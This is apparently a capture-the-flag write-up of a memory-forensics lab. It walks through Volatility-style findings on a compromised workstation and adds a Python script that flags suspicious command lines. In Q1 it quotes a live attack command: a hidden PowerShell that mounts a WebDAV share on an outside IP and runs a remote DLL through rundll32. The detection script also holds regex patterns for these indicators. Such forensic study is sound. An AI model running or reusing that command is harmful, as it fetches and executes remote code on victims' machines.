
This is a write-up of the CyberDefenders Reveal lab.
1. Challenge description
As a cybersecurity analyst for a leading financial institution, an alert from your SIEM solution has flagged unusual activity on an internal workstation. Given the sensitive financial data at risk, immediate action is required to prevent potential breaches.
Your task is to delve into the provided memory dump from the compromised system. You need to identify basic Indicators of Compromise (IOCs) and determine the extent of the intrusion. Investigate the malicious commands or files executed in the environment, and report your findings in detail to aid in remediation and enhance future defenses.
Q1.
Identifying the name of the malicious process helps in understanding the nature of the attack. What is the name of the malicious process?

powershell.exe -windowstyle hidden net use \45.9.74.32@8888\davwwwroot\ ; rundll32 \45.9.74.32@8888\davwwwroot\3435.dll,entry:
While going through the processes with pstree, the command-line arguments of the powershell process show commands such as net use and a hidden window style, which indicate attack behaviour.

Q2.
Knowing the parent process ID (PID) of the malicious process aids in tracing the process hierarchy and understanding the attack flow. What is the parent PID of the malicious process?

In the file generated with the pstree plugin, the number on the left is the PID of that process and the number on the right is the PPID, which is the parent PID asked for in the question.
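As an added example (not from the original write-up), the following Python script applies the reasoning from Q1 and Q2 to a constructed, simplified pstree-style listing: it flags command lines carrying the indicators seen above and resolves each hit's parent PID. The pipe-delimited layout, the sample PIDs and the rows themselves are assumptions.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Assumed simplified pstree row: PID | PPID | image name | command line.
@dataclass
class Proc:
    pid: int
    ppid: int
    name: str
    cmdline: str

# Constructed sample modelled on the command line in the write-up (not the real dump's output).
SAMPLE_PSTREE = r"""
4|0|System|
624|4|smss.exe|\SystemRoot\System32\smss.exe
3548|3452|explorer.exe|C:\Windows\Explorer.EXE
3692|3548|powershell.exe|powershell.exe -windowstyle hidden net use \\45.9.74.32@8888\davwwwroot\ ; rundll32 \\45.9.74.32@8888\davwwwroot\3435.dll,entry
3720|3692|rundll32.exe|rundll32 \\45.9.74.32@8888\davwwwroot\3435.dll,entry
"""

# Indicators drawn from the powershell command line discussed above.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "webdav_net_use": re.compile(r"\bnet\s+use\s+\\\\\S+@\d+\\davwwwroot", re.I),
    "rundll32_unc_dll": re.compile(r"\brundll32(?:\.exe)?\s+\\\\\S+\.dll,", re.I),
}

def parse_pstree(text: str) -> List[Proc]:
    procs = []
    for line in text.splitlines():
        if not line.strip():
            continue
        pid, ppid, name, cmdline = line.split("|", 3)
        procs.append(Proc(int(pid), int(ppid), name, cmdline))
    return procs

def find_suspicious(procs: List[Proc]) -> List[Tuple[Proc, List[str], Optional[Proc]]]:
    """Return (process, matched indicator names, parent process or None) for each hit."""
    by_pid = {p.pid: p for p in procs}
    hits = []
    for p in procs:
        matched = [k for k, rx in INDICATORS.items() if rx.search(p.cmdline)]
        if matched:
            hits.append((p, matched, by_pid.get(p.ppid)))
    return hits

if __name__ == "__main__":
    for proc, why, parent in find_suspicious(parse_pstree(SAMPLE_PSTREE)):
        pname = parent.name if parent else "?"
        print(f"{proc.name} (PID {proc.pid}, PPID {proc.ppid} = {pname}): {', '.join(why)}")
```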

Q3.
Determining the file name used by the malware for executing the second-stage payload is crucial for identifying subsequent malicious activities. What is the file name that the malware uses to execute the second-stage payload?
This question could also be answered by examining the command executed by the powershell process above.


Q4.
Identifying the shared directory on the remote server helps trace the resources targeted by the attacker. What is the name of the shared directory being accessed on the remote server?
This question asks for the directory that file is located in.

Q5.
What is the MITRE sub-technique ID used by the malware to execute the second-stage payload?
I solved this question with ChatGPT.

Q6.
Identifying the username under which the malicious process runs helps in assessing the compromised account and its potential impact. What is the username that the malicious process runs under?
I used the getsids plugin to answer this question.


Q7.
Knowing the name of the malware family is essential for correlating the attack with known threats and developing appropriate defenses. What is the name of the malware family?
This question could be answered using VirusTotal.


